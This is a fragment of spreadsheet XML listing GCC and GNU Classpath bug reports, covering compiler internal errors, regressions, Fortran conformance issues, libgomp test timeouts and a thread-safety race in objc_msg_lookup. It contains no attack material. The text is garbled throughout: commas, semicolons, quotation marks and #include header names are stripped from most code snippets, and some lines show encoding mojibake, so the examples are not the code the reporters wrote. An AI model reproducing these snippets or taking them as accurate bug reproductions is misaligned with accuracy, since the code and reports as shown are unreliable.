gfortran -c err.f90 
err.f90:6.20:
    integer :: i = 0
                    1
Error: Initialization of variable at (1) is not allowed in a PURE procedure
However I think that the program is fine.
module mod_xyz
 implicit none
contains
 pure subroutine psub()
  type ilist
    integer :: i = 0
  end type ilist
 end subroutine psub
end module mod_xyz</t>
  </si>
  <si>
    <t>GCC-52983</t>
  </si>
  <si>
    <t>[4.8 Regression] internal compiler error: in df_uses_record at df-scan.c:3243</t>
  </si>
  <si>
    <t>Created attachment 27154
preprocessed source
$ ~/gcc/4.x/bin/g++ -m32  23875.ii  -fPIC -O2 -g -v
Using built-in specs.
COLLECT_GCC=/home/jwakely/gcc/4.x/bin/g++
COLLECT_LTO_WRAPPER=/home/jwakely/gcc/4.x/libexec/gcc/powerpc64-unknown-linux-gnu/4.8.0/lto-wrapper
Target: powerpc64-unknown-linux-gnu
Configured with: /home/jwakely/src/gcc/configure --prefix=/home/jwakely/gcc/4.x --with-system-zlib --enable-languages=cc++ --with-gnu-ld --with-gnu-as --disable-libquadmath --disable-libitm --disable-libmudflap --disable-nls --disable-bootstrap
Thread model: posix
gcc version 4.8.0 20120413 (experimental) [trunk revision 186436] (GCC) 
COLLECT_GCC_OPTIONS='-m32' '-fPIC' '-O2' '-g' '-v' '-shared-libgcc'
 /home/jwakely/gcc/4.x/libexec/gcc/powerpc64-unknown-linux-gnu/4.8.0/cc1plus -fpreprocessed 23875.ii -quiet -dumpbase 23875.ii -m32 -auxbase 23875 -g -O2 -version -fPIC -o /tmp/ccDtf7pw.s
GNU C++ (GCC) version 4.8.0 20120413 (experimental) [trunk revision 186436] (powerpc64-unknown-linux-gnu)
        compiled by GNU C version 4.6.2 20111027 (Red Hat 4.6.2-1) GMP version 4.3.2 MPFR version 2.4.2 MPC version 0.8.1
GGC heuristics: --param ggc-min-expand=30 --param ggc-min-heapsize=4096
GNU C++ (GCC) version 4.8.0 20120413 (experimental) [trunk revision 186436] (powerpc64-unknown-linux-gnu)
        compiled by GNU C version 4.6.2 20111027 (Red Hat 4.6.2-1) GMP version 4.3.2 MPFR version 2.4.2 MPC version 0.8.1
GGC heuristics: --param ggc-min-expand=30 --param ggc-min-heapsize=4096
Compiler executable checksum: b25903b7e9a48fba208e5bb0f20164ad
/home/jwakely/src/gcc/libstdc++-v3/testsuite/27_io/basic_ostream/inserters_arithmetic/pod/23875.cc: In function 'void test01()':
/home/jwakely/src/gcc/libstdc++-v3/testsuite/27_io/basic_ostream/inserters_arithmetic/pod/23875.cc:78:1: internal compiler error: in df_uses_record at df-scan.c:3243
 }
 ^
Please submit a full bug report
with preprocessed source if appropriate.
See  for instructions.</t>
  </si>
  <si>
    <t>GCC-77563</t>
  </si>
  <si>
    <t>[5 Regression] explicit constructor breaks narrowing conversion overload resolution</t>
  </si>
  <si>
    <t>In the following snippet an error should be emitted - instead the compiler prints a warning and keeps compiling and simply skips the second call to f (!) in the resulting executable:
#include 
#include 
struct A {
  A(int32_t a) {}
  A(uint32_t a) {}  // Comment to make it work
  explicit A(int64_t a) {}  // Comment to make it work
}
void f(A a) { printf(hello\n) }
int main(int char**) {
  f(2)
  f(3l)
}
/opt/gcc62/bin/g++ -std=gnu++11 explicit.cpp
explicit.cpp: In function â€˜int main(int char**)â€™:
explicit.cpp:11:6: note:   initializing argument 1 of â€˜void f(A)â€™
 void f(A a) { printf(hello\n) }
      ^
With either marked constructor commented compiles correctly and gives the expected output (hello x 2 or ambiguity error).</t>
  </si>
  <si>
    <t>GCC-29118</t>
  </si>
  <si>
    <t>[4.2 Regression] Timeouts in libstdc++ libjava and libgomp testsuites</t>
  </si>
  <si>
    <t>=== libstdc++ tests ===
Running target unix
WARNING: program timed out.
FAIL: 19_diagnostics/23591_thread-1.c execution test
...
WARNING: program timed out.
FAIL: ext/mt_allocator/22309_thread.cc execution test
WARNING: program timed out.
FAIL: thread/18185.cc execution test
WARNING: program timed out.
FAIL: thread/pthread1.cc execution test
WARNING: program timed out.
FAIL: thread/pthread2.cc execution test
WARNING: program timed out.
FAIL: thread/pthread3.cc execution test
WARNING: program timed out.
FAIL: thread/pthread4.cc execution test
WARNING: program timed out.
FAIL: thread/pthread5.cc execution test
WARNING: program timed out.
FAIL: thread/pthread6.cc execution test
WARNING: program timed out.
FAIL: thread/pthread7-rope.cc execution test
WARNING: program timed out.
FAIL: tr1/2_general_utilities/memory/shared_ptr/thread/default_weaktoshared.cc execution test
WARNING: program timed out.
FAIL: tr1/2_general_utilities/memory/shared_ptr/thread/mutex_weaktoshared.cc execution test
                === libjava tests ===
Running target unix
WARNING: program timed out.
FAIL: cxxtest run
                === libgomp tests ===
Running target unix
WARNING: program timed out.
FAIL: libgomp.c++/ctor-1.C  -O0  execution test
WARNING: program timed out.
FAIL: libgomp.c++/ctor-1.C  -O1  execution test
WARNING: program timed out.
FAIL: libgomp.c++/ctor-1.C  -O2  execution test
WARNING: program timed out.
FAIL: libgomp.c++/ctor-1.C  -O3 -fomit-frame-pointer  execution test
WARNING: program timed out.
FAIL: libgomp.c++/ctor-1.C  -O3 -fomit-frame-pointer -funroll-loops  execution test
WARNING: program timed out.
FAIL: libgomp.c++/ctor-1.C  -O3 -fomit-frame-pointer -funroll-all-loops -finline-functions  execution test
WARNING: program timed out.
FAIL: libgomp.c++/ctor-1.C  -O3 -g  execution test
WARNING: program timed out.
FAIL: libgomp.c++/ctor-1.C  -Os  execution test
WARNING: program timed out.
FAIL: libgomp.c++/ctor-2.C  -O0  execution test
WARNING: program timed out.
FAIL: libgomp.c++/ctor-2.C  -O1  execution test
WARNING: program timed out.
FAIL: libgomp.c++/ctor-2.C  -O2  execution test
WARNING: program timed out.
FAIL: libgomp.c++/ctor-2.C  -O3 -fomit-frame-pointer  execution test
WARNING: program timed out.
FAIL: libgomp.c++/ctor-2.C  -O3 -fomit-frame-pointer -funroll-loops  execution test
WARNING: program timed out.
FAIL: libgomp.c++/ctor-2.C  -O3 -fomit-frame-pointer -funroll-all-loops -finline-functions  execution test
WARNING: program timed out.
FAIL: libgomp.c++/ctor-2.C  -O3 -g  execution test
WARNING: program timed out.
FAIL: libgomp.c++/ctor-2.C  -Os  execution test
WARNING: program timed out.
FAIL: libgomp.c++/ctor-3.C  -O0  execution test
WARNING: program timed out.
FAIL: libgomp.c++/ctor-3.C  -O1  execution test
WARNING: program timed out.
FAIL: libgomp.c++/ctor-3.C  -O2  execution test
WARNING: program timed out.
FAIL: libgomp.c++/ctor-3.C  -O3 -fomit-frame-pointer  execution test
WARNING: program timed out.
FAIL: libgomp.c++/ctor-3.C  -O3 -fomit-frame-pointer -funroll-loops  execution test
WARNING: program timed out.
FAIL: libgomp.c++/ctor-3.C  -O3 -fomit-frame-pointer -funroll-all-loops -finline-functions  execution test
WARNING: program timed out.
FAIL: libgomp.c++/ctor-3.C  -O3 -g  execution test
WARNING: program timed out.
FAIL: libgomp.c++/ctor-3.C  -Os  execution test
WARNING: program timed out.
FAIL: libgomp.c++/ctor-4.C  -O0  execution test
WARNING: program timed out.
FAIL: libgomp.c++/ctor-4.C  -O1  execution test
WARNING: program timed out.
FAIL: libgomp.c++/ctor-4.C  -O2  execution test
WARNING: program timed out.
FAIL: libgomp.c++/ctor-4.C  -O3 -fomit-frame-pointer  execution test
WARNING: program timed out.
FAIL: libgomp.c++/ctor-4.C  -O3 -fomit-frame-pointer -funroll-loops  execution test
WARNING: program timed out.
FAIL: libgomp.c++/ctor-4.C  -O3 -fomit-frame-pointer -funroll-all-loops -finline-functions  execution test
WARNING: program timed out.
FAIL: libgomp.c++/ctor-4.C  -O3 -g  execution test
WARNING: program timed out.
FAIL: libgomp.c++/ctor-4.C  -Os  execution test
WARNING: program timed out.
FAIL: libgomp.c++/ctor-6.C  -O0  execution test
WARNING: program timed out.
FAIL: libgomp.c++/ctor-6.C  -O1  execution test
WARNING: program timed out.
FAIL: libgomp.c++/ctor-6.C  -O2  execution test
WARNING: program timed out.
FAIL: libgomp.c++/ctor-6.C  -O3 -fomit-frame-pointer  execution test
WARNING: program timed out.
FAIL: libgomp.c++/ctor-6.C  -O3 -fomit-frame-pointer -funroll-loops  execution test
WARNING: program timed out.
FAIL: libgomp.c++/ctor-6.C  -O3 -fomit-frame-pointer -funroll-all-loops -finline-functions  execution test
WARNING: program timed out.
FAIL: libgomp.c++/ctor-6.C  -O3 -g  execution test
WARNING: program timed out.
FAIL: libgomp.c++/ctor-6.C  -Os  execution test
WARNING: program timed out.
FAIL: libgomp.c++/ctor-7.C  -O0  execution test
WARNING: program timed out.
FAIL: libgomp.c++/ctor-7.C  -O1  execution test
WARNING: program timed out.
FAIL: libgomp.c++/ctor-7.C  -O2  execution test
WARNING: program timed out.
FAIL: libgomp.c++/ctor-7.C  -O3 -fomit-frame-pointer  execution test
WARNING: program timed out.
FAIL: libgomp.c++/ctor-7.C  -O3 -fomit-frame-pointer -funroll-loops  execution test
WARNING: program timed out.
FAIL: libgomp.c++/ctor-7.C  -O3 -fomit-frame-pointer -funroll-all-loops -finline-functions  execution test
WARNING: program timed out.
FAIL: libgomp.c++/ctor-7.C  -O3 -g  execution test
WARNING: program timed out.
FAIL: libgomp.c++/ctor-7.C  -Os  execution test
WARNING: program timed out.
FAIL: libgomp.c++/loop-1.C  -O  execution test
WARNING: program timed out.
FAIL: libgomp.c++/loop-2.C  -O  execution test
WARNING: program timed out.
FAIL: libgomp.c++/loop-3.C  -O  execution test
WARNING: program timed out.
FAIL: libgomp.c++/loop-4.C  -O  execution test
WARNING: program timed out.
FAIL: libgomp.c++/loop-5.C  -O  execution test
WARNING: program timed out.
FAIL: libgomp.c++/loop-6.C  -O0  execution test
WARNING: program timed out.
FAIL: libgomp.c++/loop-6.C  -O1  execution test
WARNING: program timed out.
FAIL: libgomp.c++/loop-6.C  -O2  execution test
WARNING: program timed out.
FAIL: libgomp.c++/loop-6.C  -O3 -fomit-frame-pointer  execution test
WARNING: program timed out.
FAIL: libgomp.c++/loop-6.C  -O3 -fomit-frame-pointer -funroll-loops  execution test
WARNING: program timed out.
FAIL: libgomp.c++/loop-6.C  -O3 -fomit-frame-pointer -funroll-all-loops -finline-functions  execution test
WARNING: program timed out.
FAIL: libgomp.c++/loop-6.C  -O3 -g  execution test
WARNING: program timed out.
FAIL: libgomp.c++/loop-6.C  -Os  execution test
WARNING: program timed out.
FAIL: libgomp.c++/loop-7.C  -O0  execution test
WARNING: program timed out.
FAIL: libgomp.c++/loop-7.C  -O1  execution test
WARNING: program timed out.
FAIL: libgomp.c++/loop-7.C  -O2  execution test
WARNING: program timed out.
FAIL: libgomp.c++/loop-7.C  -O3 -fomit-frame-pointer  execution test
WARNING: program timed out.
FAIL: libgomp.c++/loop-7.C  -O3 -fomit-frame-pointer -funroll-loops  execution test
WARNING: program timed out.
FAIL: libgomp.c++/loop-7.C  -O3 -fomit-frame-pointer -funroll-all-loops -finline-functions  execution test
WARNING: program timed out.
FAIL: libgomp.c++/loop-7.C  -O3 -g  execution test
WARNING: program timed out.
FAIL: libgomp.c++/loop-7.C  -Os  execution test
WARNING: program timed out.
FAIL: libgomp.c++/master-1.C  -O0  execution test
WARNING: program timed out.
FAIL: libgomp.c++/master-1.C  -O1  execution test
WARNING: program timed out.
FAIL: libgomp.c++/master-1.C  -O2  execution test
WARNING: program timed out.
FAIL: libgomp.c++/master-1.C  -O3 -fomit-frame-pointer  execution test
WARNING: program timed out.
FAIL: libgomp.c++/master-1.C  -O3 -fomit-frame-pointer -funroll-loops  execution test
WARNING: program timed out.
FAIL: libgomp.c++/master-1.C  -O3 -fomit-frame-pointer -funroll-all-loops -finline-functions  execution test
WARNING: program timed out.
FAIL: libgomp.c++/master-1.C  -O3 -g  execution test
WARNING: program timed out.
FAIL: libgomp.c++/master-1.C  -Os  execution test
WARNING: program timed out.
FAIL: libgomp.c++/nested-1.C  -O0  execution test
WARNING: program timed out.
FAIL: libgomp.c++/nested-1.C  -O1  execution test
WARNING: program timed out.
FAIL: libgomp.c++/nested-1.C  -O2  execution test
WARNING: program timed out.
FAIL: libgomp.c++/nested-1.C  -O3 -fomit-frame-pointer  execution test
WARNING: program timed out.
FAIL: libgomp.c++/nested-1.C  -O3 -fomit-frame-pointer -funroll-loops  execution test
WARNING: program timed out.
FAIL: libgomp.c++/nested-1.C  -O3 -fomit-frame-pointer -funroll-all-loops -finline-functions  execution test
WARNING: program timed out.
FAIL: libgomp.c++/nested-1.C  -O3 -g  execution test
WARNING: program timed out.
FAIL: libgomp.c++/nested-1.C  -Os  execution test
WARNING: program timed out.
FAIL: libgomp.c++/parallel-1.C  -O  execution test
WARNING: program timed out.
FAIL: libgomp.c++/pr26691.C  -O  execution test
WARNING: program timed out.
FAIL: libgomp.c++/pr26943.C  -O0  execution test
WARNING: program timed out.
FAIL: libgomp.c++/pr26943.C  -O1  execution test
WARNING: program timed out.
FAIL: libgomp.c++/pr26943.C  -O2  execution test
WARNING: program timed out.
FAIL: libgomp.c++/pr26943.C  -O3 -fomit-frame-pointer  execution test
WARNING: program timed out.
FAIL: libgomp.c++/pr26943.C  -O3 -fomit-frame-pointer -funroll-loops  execution test
WARNING: program timed out.
FAIL: libgomp.c++/pr26943.C  -O3 -fomit-frame-pointer -funroll-all-loops -finline-functions  execution test
WARNING: program timed out.
FAIL: libgomp.c++/pr26943.C  -O3 -g  execution test
WARNING: program timed out.
FAIL: libgomp.c++/pr26943.C  -Os  execution test
WARNING: program timed out.
FAIL: libgomp.c++/pr27337.C  -O0  execution test
WARNING: program timed out.
FAIL: libgomp.c++/pr27337.C  -O1  execution test
WARNING: program timed out.
FAIL: libgomp.c++/pr27337.C  -O2  execution test
WARNING: program timed out.
FAIL: libgomp.c++/pr27337.C  -O3 -fomit-frame-pointer  execution test
WARNING: program timed out.
FAIL: libgomp.c++/pr27337.C  -O3 -fomit-frame-pointer -funroll-loops  execution test
WARNING: program timed out.
FAIL: libgomp.c++/pr27337.C  -O3 -fomit-frame-pointer -funroll-all-loops -finline-functions  execution test
WARNING: program timed out.
FAIL: libgomp.c++/pr27337.C  -O3 -g  execution test
WARNING: program timed out.
FAIL: libgomp.c++/pr27337.C  -Os  execution test
WARNING: program timed out.
FAIL: libgomp.c++/reduction-1.C  -O  execution test
WARNING: program timed out.
FAIL: libgomp.c++/reduction-2.C  -O  execution test
WARNING: program timed out.
FAIL: libgomp.c++/reduction-3.C  -O  execution test
WARNING: program timed out.
FAIL: libgomp.c++/sections-1.C  -O  execution test
WARNING: program timed out.
FAIL: libgomp.c++/shared-1.C  -O  execution test
WARNING: program timed out.
FAIL: libgomp.c++/shared-2.C  -O  execution test
WARNING: program timed out.
FAIL: libgomp.c++/single-1.C  -O  execution test
WARNING: program timed out.
FAIL: libgomp.c++/single-2.C  -O  execution test
WARNING: program timed out.
FAIL: libgomp.c++/single-3.C  -O  execution test
These timeouts started about three days ago.  There
weren't present at revision 116916M.  The problem isn't
present using hpux.</t>
  </si>
  <si>
    <t>GCC-20878</t>
  </si>
  <si>
    <t>Interface body cannot access named entities by host association</t>
  </si>
  <si>
    <t>The following is non-standard and the compiler should probably generate a
warning/error with '-pedantic -std=f95'
MODULE TEST
TYPE data_type
INTEGER :: I
END TYPE data_type
INTERFACE
 SUBROUTINE TRY(X)
   TYPE(data_type) :: X ! see note 14.10
 END SUBROUTINE TRY
END INTERFACE
END MODULE
PROGRAM TT
 USE TEST
END PROGRAM TT</t>
  </si>
  <si>
    <t>GCC-51807</t>
  </si>
  <si>
    <t>Fail to generate .gcno file when use libtool to compile la library</t>
  </si>
  <si>
    <t>1.The project need to use libtool to compile la files.
2.Add LIBS+= -lgcov in configure
3.configure CFLAGS=-g -Wall -Werror -Wno-unknown-pragmas -fprofile-arcs -ftest-coverage \
             CXXFLAGS=-g -Wall -Werror -Wno-unknown-pragmas -fprofile-arcs -ftest-coverage \
             --enable-unit-tests \
             --enable-libcurl \
             --disable-shared \
             --enable-developer-mode \
4.make
5.Check the la related cpp files ant gcov didn't generate .gcno file.
Is there any work around to resolve this issue? or if it needs to add additional parameter.</t>
  </si>
  <si>
    <t>beanflowersh</t>
  </si>
  <si>
    <t>GCC-19041</t>
  </si>
  <si>
    <t>[4.0 Regression] -fvisibility=hidden causes bad codegen for common symbols</t>
  </si>
  <si>
    <t>Compile the following file with -fvisibility=hidden
int foo
void bar(void) { foo = 0 }
You will find that the assembler rejects the .s file that the compiler creates giving the error:
/var/tmp//cclfEVh7.s:16:non-relocatable subtraction expression _foo minus L00000000001$pb
/var/tmp//cclfEVh7.s:16:symbol: _foo can't be undefined in a subtraction expression
The assembler is right to complain.  The compiler generates these lines:
        addis r2r31ha16(_foo-L00000000001$pb)
        la r2lo16(_foo-L00000000001$pb)(r2)
This is incorrect.  Common symbols must be treated as undefined symbols so they must be addressed 
indirectly through non-lazy pointers.  Without -fvisibility=hidden the compiler gets this right.</t>
  </si>
  <si>
    <t>CLASSPATH-18312</t>
  </si>
  <si>
    <t>Component.createImage() doesn't clear bitmap</t>
  </si>
  <si>
    <t>An image created with Component.createImage() is supposed to be filled with the
default component background gray.
Currently it simply mallocs the pixmap data without initializing it which is
also a mild security flaw.
Suggested fix is to do a fillRect() after creating the graphics context in
GtkComponentPeer.java.
An (faster) alternative would be to do a memset in the c method
Java_gnu_java_awt_peer_gtk_GdkGraphics_initState__II.</t>
  </si>
  <si>
    <t>GCC-2719</t>
  </si>
  <si>
    <t>demangler crash</t>
  </si>
  <si>
    <t>I'm using the current gcc 3.0 branch.
This crashes the demangler:
./c++filt _Utf58_0_1__1_2147483647__2147483648
Release:
unknown
Environment:
x86 Red Hat Linux 6.2</t>
  </si>
  <si>
    <t>GCC-59031</t>
  </si>
  <si>
    <t>[4.8/4.9 Regression] vtable lookup not optimized away</t>
  </si>
  <si>
    <t>Created attachment 31175
Proposed patch
The fix to PR c++/11750 at r193504 caused a regression in the following code at -O0:
class B {
 public:
  virtual int add (int a int b) {return a+ b}
}
class D : public B {
}
int foo (int a int b) {
  D d
  return d.add(a b)
}
The call d.add(a b) used to generate a direct call to B::add but now generates an indirect call. At -O2 FRE could devirtualize this in some situations but not always. The attached patch fixes this case and bootstraps fine. Is this a reasonable fix?</t>
  </si>
  <si>
    <t>GCC-24889</t>
  </si>
  <si>
    <t>GCC-31045</t>
  </si>
  <si>
    <t>gcc4.1. has problems with pointers</t>
  </si>
  <si>
    <t>Hi 
      The following simple testcase does not compile using GCC4.1.1
#include 
int main() {
	char **const p = (char **)std::malloc(sizeof*p)
	return !p
}</t>
  </si>
  <si>
    <t>GCC-69162</t>
  </si>
  <si>
    <t>trunk r232077 i686-linux-gnu works with -O0
reduced test case:
void fn1() {
  void *a
  __builtin_va_list *b = a
  __builtin_va_arg(*b struct _CK_ATTRIBUTE *)
}
$ gcc -g -O2 -c attrs.i 
attrs.i: In function 'fn1':
attrs.i:4:24: internal compiler error: in create_tmp_var at gimple-expr.c:468
   __builtin_va_arg(*b struct _CK_ATTRIBUTE *)
   ~~~~~~~~~~~~~~~~~~~~~^~~~~~~~~~~~~~~~~~~~~~~
0x83d3de7 create_tmp_var(tree_node* char const*)
        ../../src/gcc/gimple-expr.c:468
0x83f13e7 create_tmp_from_val
        ../../src/gcc/gimplify.c:498
0x83f13e7 lookup_tmp_var
        ../../src/gcc/gimplify.c:519
0x83f13e7 internal_get_tmp_var
        ../../src/gcc/gimplify.c:563
0x85c2fae std_gimplify_va_arg_expr(tree_node* tree_node* gimple** gimple**)
        ../../src/gcc/targhooks.c:1828
0x881d631 ix86_gimplify_va_arg
        ../../src/gcc/config/i386/i386.c:10288
0x8748e59 expand_ifn_va_arg_1
        ../../src/gcc/tree-stdarg.c:1043
0x8748e59 expand_ifn_va_arg
        ../../src/gcc/tree-stdarg.c:1111
0x874a100 execute
        ../../src/gcc/tree-stdarg.c:1164
Please submit a full bug report
with preprocessed source if appropriate.</t>
  </si>
  <si>
    <t>GCC-2024</t>
  </si>
  <si>
    <t>libgcj can abort on bogus arguments to Class.forName()</t>
  </si>
  <si>
    <t>$ ./a.out
libgcj failure: couldn't understand class signature
Aborted (core dumped)
It should not be possible to crash the runtime with 
Class.forName. Instead it probibly should throw a
ClassNotFoundException or something.
Release:
unknown
How-To-Repeat:
public class T
{
  public static void main(String args[])
    throws ClassNotFoundException
  {
    Class.forName([[Object)
  }
}
The attached test case from Kaffe's regression suite 
provides a more extensive test of forName functionality 
(and it shows up other bugs that I'm not quite so concerned about...)</t>
  </si>
  <si>
    <t>GCC-9734</t>
  </si>
  <si>
    <t>[ABI] nearly empty-class not recognized in dump file</t>
  </si>
  <si>
    <t>nearly empty-class D not identified in dump class hierarchy file.
Sourc code for a.cpp:
------------------------------------------------
struct A {
        static int aval
}
int A::aval=0
struct B : A {}
struct C : A {}
struct D : B C {
        virtual void v1(){}
}
D d
------------------------------------------------
Actual class hierarchy for D (within a.cpp.class):
------------------------------------------------
Class D
   size=8 align=4
D (0x40092c40) 0
    vptr=((&amp;D::_ZTV1D) + 8)
  B (0x40092c80) 0 empty
    A (0x40092cc0) 0 empty
  C (0x40092d00) 4 empty
    A (0x40092d40) 4 empty
------------------------------------------------
Expected class hierarchy for D (within a.cpp.class):
------------------------------------------------
Class D
   size=8 align=4
D (0x00000000) 0 nearly-empty
    vptr=((&amp;D::_ZTV1D) + 8)
  B (0x00000000) 0 empty
    A (0x00000000) 0 empty
  C (0x00000000) 4 empty
    A (0x00000000) 4 empty
------------------------------------------------
Release:
GCC Version: 3.2.0
Environment:
System Type:
Linux Version 2.4.19 SuSE SLES 8 (ppc) - Kernel 2.4.19-ul1-ppc64-SMP (36).
GNU assembler version 2.12.90.0.15 (powerpc-suse-linux) using BFD version 2.12.9
0.0.15 20020717 (SuSE)
Options given when GCC was configured/built:
Configured with: /usr/src/packages/BUILD/cross-ppc64-gcc-3.2/gcc-3.2/configure -
-enable-languages=cc++f77 --prefix=/opt/cross --host=powerpc-suse-linux --targ
et=powerpc64-linux --enable-threads=posix --disable-nls --enable-shared --with-h
eaders=/usr/src/packages/BUILD/cross-ppc64-gcc-3.2/include-ppc64-glibc-2.2.5
Thread model: posix
gcc version 3.2
How-To-Repeat:
g++ -fdump-class-hierarchy -c a.cpp</t>
  </si>
  <si>
    <t>GCC-52555</t>
  </si>
  <si>
    <t>[4.6/4.7/4.8 Regression] ICE unrecognizable insn with -ffast-math and __attribute__((optimize(xx)))</t>
  </si>
  <si>
    <t>$ cat test.cpp 
typedef unsigned long value_t
struct foo {
    static float _factor
    value_t _val
    foo()
    :  _val(7)
    {
        _val=__builtin_ceil(_val * _factor)
    }
}
struct bar {
    void operator()(foo
}
void
__attribute__((optimize(O)))
test() {
    foo f
    bar b
    b(f)
}
int main() {
    test()
}
$ g++ -c -O2 -ffast-math test.cpp
test.cpp: In function â€˜void test()â€™:
test.cpp:24:1: error: unrecognizable insn:
(insn 9 8 10 3 (parallel [
            (set (reg:XF 67)
                (unspec:XF [
                        (reg:XF 68)
                    ] UNSPEC_FRNDINT_CEIL))
            (clobber (reg:CC 17 flags))
        ]) test.cpp:10 -1
     (nil))
test.cpp:24:1: internal compiler error: in extract_insn at recog.c:2109
Please submit a full bug report
This happens with x86 and x86_64.</t>
  </si>
  <si>
    <t>GCC-62008</t>
  </si>
  <si>
    <t>CilkPlus Array Notation ICE in build_array_notation_ref when trying to build  a multidimensional array from a pointer.</t>
  </si>
  <si>
    <t>Created attachment 33234
Minimal reproducer
==== Steps to reproduce ====
    - Build with: g++ -fcilkplus -c multidim.cpp
    - Observe that an ICE is produced.
  ==== What I expected to happen ====
    - g++ should compile the code without generating an ICE or any other error
      (I *think* the code is valid).
  ==== What actually happened ====
    - Trunk g++ produced the following output:
      $ ${GCC_TRUNK}/bin/g++ -fcilkplus -c multidim.cpp
      multidim.cpp: In function 'void f(int* int int)':
      multidim.cpp:4:25: internal compiler error: in build_array_notation_ref at cp/cp-array-notation.c:1407
	tmp[:][:] = a[0:w][0:h]
			      ^
      0x74ee4a build_array_notation_ref(unsigned int tree_node* tree_node* tree_node* tree_node* tree_node*)
	      /home/nicholas/GCCCilk/bug/native/gcc-4.9.0/gcc/cp/cp-array-notation.c:1407
      0x661549 cp_parser_array_notation
	      /home/nicholas/GCCCilk/bug/native/gcc-4.9.0/gcc/cp/parser.c:6388
      0x661549 cp_parser_postfix_open_square_expression
	      /home/nicholas/GCCCilk/bug/native/gcc-4.9.0/gcc/cp/parser.c:6453
      0x661549 cp_parser_postfix_expression
	      /home/nicholas/GCCCilk/bug/native/gcc-4.9.0/gcc/cp/parser.c:6053
      0x664558 cp_parser_unary_expression
	      /home/nicholas/GCCCilk/bug/native/gcc-4.9.0/gcc/cp/parser.c:7293
      0x665189 cp_parser_binary_expression
	      /home/nicholas/GCCCilk/bug/native/gcc-4.9.0/gcc/cp/parser.c:8036
      0x66575b cp_parser_assignment_expression
	      /home/nicholas/GCCCilk/bug/native/gcc-4.9.0/gcc/cp/parser.c:8279
      0x665bf5 cp_parser_assignment_expression
	      /home/nicholas/GCCCilk/bug/native/gcc-4.9.0/gcc/cp/parser.c:8329
      0x665bf5 cp_parser_constant_expression
	      /home/nicholas/GCCCilk/bug/native/gcc-4.9.0/gcc/cp/parser.c:8539
      0x665936 cp_parser_assignment_expression
	      /home/nicholas/GCCCilk/bug/native/gcc-4.9.0/gcc/cp/parser.c:8298
      0x667e03 cp_parser_expression
	      /home/nicholas/GCCCilk/bug/native/gcc-4.9.0/gcc/cp/parser.c:8441
      0x66862c cp_parser_expression
	      /home/nicholas/GCCCilk/bug/native/gcc-4.9.0/gcc/cp/parser.c:8480
      0x66862c cp_parser_expression_statement
	      /home/nicholas/GCCCilk/bug/native/gcc-4.9.0/gcc/cp/parser.c:9819
      0x65d1d8 cp_parser_statement
	      /home/nicholas/GCCCilk/bug/native/gcc-4.9.0/gcc/cp/parser.c:9670
      0x65dfe9 cp_parser_statement_seq_opt
	      /home/nicholas/GCCCilk/bug/native/gcc-4.9.0/gcc/cp/parser.c:9942
      0x65e156 cp_parser_compound_statement
	      /home/nicholas/GCCCilk/bug/native/gcc-4.9.0/gcc/cp/parser.c:9896
      0x66f64b cp_parser_function_body
	      /home/nicholas/GCCCilk/bug/native/gcc-4.9.0/gcc/cp/parser.c:18961
      0x66f64b cp_parser_ctor_initializer_opt_and_function_body
	      /home/nicholas/GCCCilk/bug/native/gcc-4.9.0/gcc/cp/parser.c:18997
      0x675cf3 cp_parser_function_definition_after_declarator
	      /home/nicholas/GCCCilk/bug/native/gcc-4.9.0/gcc/cp/parser.c:23162
      0x676bae cp_parser_function_definition_from_specifiers_and_declarator
	      /home/nicholas/GCCCilk/bug/native/gcc-4.9.0/gcc/cp/parser.c:23074
      Please submit a full bug report
      with preprocessed source if appropriate.
      Please include the complete backtrace with any bug report.
      See  for instructions.
  ==== Environment ====
  I have tried this with:
   - My system GCC (g++ version 4.9.1)
   - A native build of GCC (${GCC_TRUNK}/bin/g++ revision r213543)
   - I have also seen an ICE for the same code in revision r213234.
  ${GCC_TRUNK}/bin/g++ is a native build of GCC with the following specified
  to the configure script:
  ./configure --prefix=${GCC_TRUNK} \
    --enable-languages=cc++fortran --disable-sjlj-exceptions
  And make invoked as: make CXXFLAGS=-g3 -O0 -j9
  $ uname -a
  Linux squamata 3.15.7-1-ARCH #1 SMP PREEMPT Mon Jul 28 20:06:17 CEST 2014 x86_64 GNU/Linux
  $ g++ --version
  g++ (GCC) 4.9.1
  Copyright (C) 2014 Free Software Foundation Inc.
  This is free software see the source for copying conditions.  There is NO
  warranty not even for MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.
  $ ${GCC_TRUNK}/bin/g++ --version
  g++ (GCC) 4.10.0 20140804 (experimental)
  Copyright (C) 2014 Free Software Foundation Inc.
  This is free software see the source for copying conditions.  There is NO
  warranty not even for MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.</t>
  </si>
  <si>
    <t>nick.tomlinson</t>
  </si>
  <si>
    <t>GCC-20854</t>
  </si>
  <si>
    <t>dummy argument of public procedure may not be of private type</t>
  </si>
  <si>
    <t>The following is non-standard and the compiler should probably generate a
warning/error with '-pedantic -std=f95'
MODULE TEST
TYPE tt
INTEGER :: I
END TYPE tt
PUBLIC  :: try
PRIVATE :: tt
CONTAINS
SUBROUTINE try(A)
  TYPE(tt) :: A
END SUBROUTINE try
END MODULE TEST
END</t>
  </si>
  <si>
    <t>GCC-5891</t>
  </si>
  <si>
    <t>ICE compiling SPEC fp test with -funroll-loops on ia64</t>
  </si>
  <si>
    <t>Compiling the SPEC CPU2000 floating point test 200.sixtrack
with -O2 -funroll-loops on ia64-unknown-linux-gnu results
in an ICE:
bug.f: In subroutine `eig66':
bug.f:69: Attempt to delete prologue/epilogue insn:
(insn 1643 1641 1645 (set (reg:DI 333 ar.lc)
        (reg:DI 41 r46)) -1 (nil)
    (nil))
bug.f:69: Internal compiler error in propagate_one_insn at flow.c:1573
This is a regression from GCC 3.0.4.
Compile the test case with -O2 -funroll-loops on ia64.
IBM's SPEC representative got permission from SPEC for me
to send in the test case.
Release:
unknown
Environment:
Itanium Red Hat Linux release 7.1.94 (Roswell)
How-To-Repeat:
Compile the test case with -O2 -funroll-loops on ia64.
IBM's SPEC representative got permission from SPEC for me
to send in the test case.</t>
  </si>
  <si>
    <t>GCC-9969</t>
  </si>
  <si>
    <t>objc_msg_lookup is not thread safe</t>
  </si>
  <si>
    <t>objc_msg_lookup contains a race condition.  The code is:
result = sarray_get_safe...
if (result == 0)
  if (receiver-&gt;class_pointer-&gt;dtable == __objc_uninstal...
    {
       __objc_init_install_dtable(...
The problem is that if two processors are hitting that code at roughly the same time one of them may see result is 0 but find that receiver-&gt;class_pointer_dtable is not __objc_uninstalled_dtable because the thread on the other processor has patched it up to contain the proper dtable entry for that class.
